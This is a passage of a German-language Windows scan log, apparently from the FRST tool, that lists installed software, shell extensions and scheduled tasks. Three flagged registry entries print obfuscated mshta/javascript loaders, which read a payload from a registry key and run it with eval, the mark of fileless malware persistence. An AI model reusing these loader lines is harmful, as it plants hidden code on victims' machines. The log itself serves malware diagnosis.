NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Defrag 5 (HKLM-x32\...\Smart Defrag_is1) (Version: 5.6.0 - IObit)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17042.12 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17042.12 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.10.4121.0 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
State of Decay (HKLM-x32\...\Steam App 241540) (Version:  - Undead Labs)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
System Shock 2 (HKLM-x32\...\1207659172_is1) (Version: 2.46 nd - GOG.com)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Banner Saga 2 (HKLM\...\Steam App 281640) (Version:  - Stoic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.5.3181 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.5.3181 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Trojan Remover (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.5.2952 - Simply Super Software)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\5b53a: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\qofqow: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" <==== ACHTUNG
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers1: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers1-x32: [MyPhoneExplorer] -> {A372C6DF-7A85-41B1-B3B0-D1E24073DCBF} => G:\Program Files (x86)\MyPhoneExplorer\DLL\ShellMgr.dll [2010-03-30] (F.J. Wechselberger)
ContextMenuHandlers1-x32: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} =>  -> Keine Datei
ContextMenuHandlers1-x32: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-07-14] (Avira Operations GmbH & Co. KG)
ContextMenuHandlers1-x32: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1-x32: [SystemSpeedupFilesMenu] -> {ef263503-8f0e-3e6a-ae2e-fe0b4b441d52} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers2: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [Advanced SystemCare] -> {2803063F-4B8D-4dc6-8874-D1802487FE2D} => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCExtMenu_64.dll [2016-09-20] (IObit)
ContextMenuHandlers4: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers4: [SystemSpeedupFoldersMenu] -> {3d52b24d-33bb-3895-99ea-a0156f24a3f9} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-07-19] (NVIDIA Corporation)
ContextMenuHandlers5: [SystemSpeedupDesktopMenu] -> {cefaf456-bc17-3f4b-b7d9-75070925911b} => C:\Windows\system32\mscoree.dll [2017-03-18] (Microsoft Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [IobitStartMenu] -> {AF8FA9C9-9907-463e-BDC3-4CC1200D6310} => C:\Program Files (x86)\IObit\Classic Start\IObitStartMenuExtension.dll [2015-12-29] (IObit)
ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight.dll [2016-05-23] (IObit)
ContextMenuHandlers6: [Shell Extension for Malware scanning] -> {45AC2688-0253-4ED8-97DE-B5370FA7D48A} => C:\Program Files (x86)\Avira\Antivirus\shlext64.dll [2017-07-14] (Avira Operations GmbH & Co. KG)
ContextMenuHandlers6: [SmartDefragExtension] -> {189F1E63-33A7-404B-B2F6-8C76A452CC54} => C:\WINDOWS\System32\IObitSmartDefragExtension.dll [2016-03-25] (IObit)
ContextMenuHandlers1_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1566530412-1856523912-1524002813-1001: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.17.0.dll [2017-07-12] (Dropbox, Inc.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0317339D-827C-47F3-91C4-7324B9D0FA87} - System32\Tasks\{A380CFB5-96EE-4AD0-A8F5-D66D9C86A514} => C:\WINDOWS\system32\pcalua.exe -a "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff\The Treasures of Mystery Island - Das Geisterschiff.exe" -d "G:\Program Files (x86)\PurpleHills\The Treasures of Mystery Island 3 - Das Geisterschiff"
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {0F18B96D-1527-4762-AC7E-B1CCB73AF929} - System32\Tasks\SmartDefrag_AutoAnalyze => C:\Program Files (x86)\IObit\Smart Defrag\AutoDefrag.exe [2016-06-06] (IObit)
Task: {126CB422-6DA9-4912-AA27-A193FABB0CE5} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\8 => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [2017-06-28] (Avira Operations GmbH & Co. KG) <==== ACHTUNG
Task: {16F4D39B-166A-4E5D-B764-42202105D976} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\7 => C:\PROGRA~2\simplitec\simplicheck\simplicheck.exe
Task: {1772C360-42E4-4485-A2AD-2DE74F81DA8F} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\2 => C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [2016-04-09] (Google, Inc) <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {1A68B86F-73A5-4DEA-B501-1218131090F6} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\9 => C:\Users\*****\AppData\Local\Microsoft\BingSvc\BingSvc.exe [2015-11-05] (© 2015 Microsoft Corporation) <==== ACHTUNG
Task: {1B266482-966D-4C9C-A722-E1BEFB5D28B0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-01] (Google Inc.)
Task: {1BED19FA-D635-4E7D-B673-1960CBD95D71} - System32\Tasks\IObitSelfCheckTask => C:\Program Files (x86)\IObit\Smart Defrag\IObitSelfCheck.exe [2016-10-18] (IObit)
Task: {2355CBBB-9A32-4AD8-A0E3-DBA0E8BC34F3} - System32\Tasks\SmartDefrag_Update => C:\Program Files (x86)\IObit\Smart Defrag\AutoUpdate.exe [2017-05-25] (IObit)
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {351619B3-1C70-488E-9AAC-94BA427BD1E5} - System32\Tasks\ASC10_SkipUac_***** => C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe [2017-05-31] (IObit)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {37AB47D1-E51C-463C-96F1-EDD5ADF87B12} - System32\Tasks\Avira\System Speedup\SpeedupSysTray => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.UI.Systray.exe [2017-06-28] (Avira Operations GmbH & Co. KG)
Task: {3987A200-F363-455C-8A55-77B75D6B0375} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\11 => C:\Program Files\CCleaner\CCleaner64.exe [2017-06-30] (Piriform Ltd) <==== ACHTUNG
Task: {3BD02220-2F87-42CC-B767-EECC4E9F9601} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.)
Task: {3C37C677-69CD-441A-8D47-EEB67B7220B5} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-07-26] (NVIDIA Corporation)
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {462F3821-DF44-4068-9F97-EFFBC54179ED} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {46ECB298-DE9D-4F8C-A5C9-75A7C20EFE1F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-06-30] (Piriform Ltd)
Task: {4836CAB9-C852-490F-BAB1-8A404135B6F4} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\6 => C:\Windows\Installer\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe [2015-02-03] (Flexera Software LLC)
Task: {49B6B7FA-1D3C-4031-B46E-A7577EDF24BF} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\9 => C:\Program Files\Logitech Gaming Software\LCore.exe [2017-01-24] (Logitech Inc.)
Task: {4AC28567-F469-42F6-ACCA-B11646D325C4} - System32\Tasks\Avira\System Speedup\Delayed Startup\*****\12 => C:\Users\*****\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2017-04-19] (Spotify Ltd) <==== ACHTUNG
Task: {4C001B95-7BB8-481D-BBD9-D9E3DEF59DFE} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-07-26] (NVIDIA Corporation)
Task: {4E9BE3D2-2F38-4DE7-98B7-EDF25E6C4078} - System32\Tasks\ASC10_PerformanceMonitor => C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe [2017-03-22] (IObit)
Task: {50222EEB-D09E-4AF2-A9C7-16E8BA809C5C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-07-11] (Microsoft Corporation)
Task: {50DDE336-6A73-4D4D-8C3A-F2B645FDDC9B} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\8 => C:\PROGRA~2\Logitech\UE Music Library\UEMLTray.exe
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
